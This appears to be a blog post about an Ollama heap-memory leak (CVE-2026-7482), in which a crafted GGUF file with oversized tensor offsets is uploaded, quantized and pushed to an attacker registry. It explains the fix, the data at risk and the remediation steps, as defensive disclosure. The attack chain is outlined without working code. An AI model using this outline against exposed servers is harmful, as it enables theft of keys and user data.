Ollama CVE-2026-7482: crafted GGUF leaks heap memory from exposed API servers

TL;DR

Affected Ollama before 0.17.1. Network-exposed instances where /api/create and /api/push are reachable without authentication

Action Update to Ollama 0.17.1+. Audit pinned Docker tags, stale VM images, and forgotten dev servers

Check Exposure of 11434/tcp, OLLAMA_HOST=0.0.0.0 in configs, reverse-proxy auth, env vars and API keys loaded into the Ollama process

CVE-2026-7482 targets how far “local” actually goes when you run a local LLM.
Cyera Research’s disclosure shows that a crafted GGUF file fed to Ollama can exfiltrate heap memory from the Ollama process via the model-create and push workflow.
CVSS is 9.1. The fix shipped in 0.17.1.

Ollama trusted GGUF size declarations

The bug lives in the GGUF loading and quantization path.
An attacker crafts a GGUF file whose tensor offsets or sizes exceed the actual file data.
When Ollama processes that file through /api/create, the quantization step reads past the end of the real buffer into adjacent heap memory.

The fix commit adds a file-size check in fs/ggml/gguf.go that verifies each tensor’s end offset against the actual file size.
server/quantization.go also gained a check that rejects tensor data shorter than what the shape metadata promises.
In short, the fix stops Ollama from blindly trusting declared values inside a GGUF.

The attack chain is compact.

flowchart TD
  A["Attacker crafts<br/>malicious GGUF"] --> B["/api/blobs<br/>uploads file to Ollama"]
  B --> C["/api/create<br/>triggers model creation"]
  C --> D["Quantization reads<br/>past buffer into heap"]
  D --> E["Leaked memory<br/>embedded in model artifact"]
  E --> F["/api/push<br/>sends artifact to attacker registry"]

The leaked data does not sit in a crash dump waiting to be found.
It gets baked into the model output artifact and shipped out via Ollama’s own push endpoint.
Cyera notes that system prompts, user conversations, environment variables, API keys, and in-flight code or documents can all end up in the leaked region.

The vulnerability bites where localhost assumptions break

Running Ollama on your Mac with ollama run is fine as long as the attacker cannot reach the API.
The issue shows up when Ollama becomes a “slightly-exposed local inference API.”

runZero notes that while Ollama defaults to binding 127.0.0.1, OLLAMA_HOST=0.0.0.0 is widespread in production setups.
Cyera estimates around 300,000 internet-facing Ollama servers.
The exact number matters less than the pattern: Ollama has quietly shifted from “inference runtime on a personal machine” to “shared AI backend.”

On this blog, I wrote about exposing a local LLM as an external API via VPN.
That setup uses LM Studio behind Tailscale, never exposing the model server directly to the public internet.
This Ollama CVE shows exactly where that distinction becomes a defense boundary.
Once 11434/tcp is reachable from outside, the model server’s API carries the same attack surface as an unauthenticated admin panel.

Even in a local RAG stack with FastAPI, Chroma, Open WebUI, and Ollama on M1 Max, if Ollama sits behind Open WebUI or FastAPI, “the UI has a login page” is not a sufficient boundary.
If Ollama’s API is visible from the same LAN or Docker network, it can be reached through a different path.

What to look for beyond chat history

The scope of a leak investigation goes beyond conversation logs.
You need to audit what shared the Ollama process space.

Location	Why it matters
Environment variables	OpenAI, Anthropic, GitHub, or internal API keys loaded into the same process environment
System prompts	Internal RAG role configs, restriction rules, internal URLs
Conversation fragments	Other users’ inputs, pasted code, document summaries lingering on the heap
Model creation logs	Entry point for tracing malicious GGUF uploads and push activity

If Ollama was behind Claude Code or an MCP bridge, tool call inputs and outputs are in scope too.
As covered in using MCP servers with Ollama and local LLMs requires a bridge, Ollama is the inference engine, not an MCP host, but the bridge side touches files, databases, and SaaS tokens.
If those results flowed back into Ollama as prompt content or tool responses, they may persist in heap memory.

This is not a case of “the AI leaked a secret through its output.”
The server process memory boundary was breached before any model-level guardrail or prompt safety check comes into play.

Fixing the read is not enough if the API is still open

Updating to 0.17.1+ closes this specific GGUF out-of-bounds read.
It does not make it safe to expose the Ollama API without authentication.

/api/create creates models.
/api/push sends artifacts to external registries.
An unauthenticated endpoint that accepts both from the network hands out significant capability, CVE or not.

Bind Ollama to 127.0.0.1 or a closed network.
If external access is needed, put Tailscale, WireGuard, mTLS, or an authenticated reverse proxy in front.
Check Docker Compose and systemd configs for lingering OLLAMA_HOST=0.0.0.0.
If you are pulling Ollama Docker images by pinned tag, update the tag.

If the API was exposed for any period, rotate API keys that lived in the Ollama process environment.
Look for unusual sequences of /api/blobs, /api/create, /api/push in logs.
Check outbound traffic to model registries.
If you run an asset discovery tool like runZero, sweep for the Ollama product name and 11434/tcp.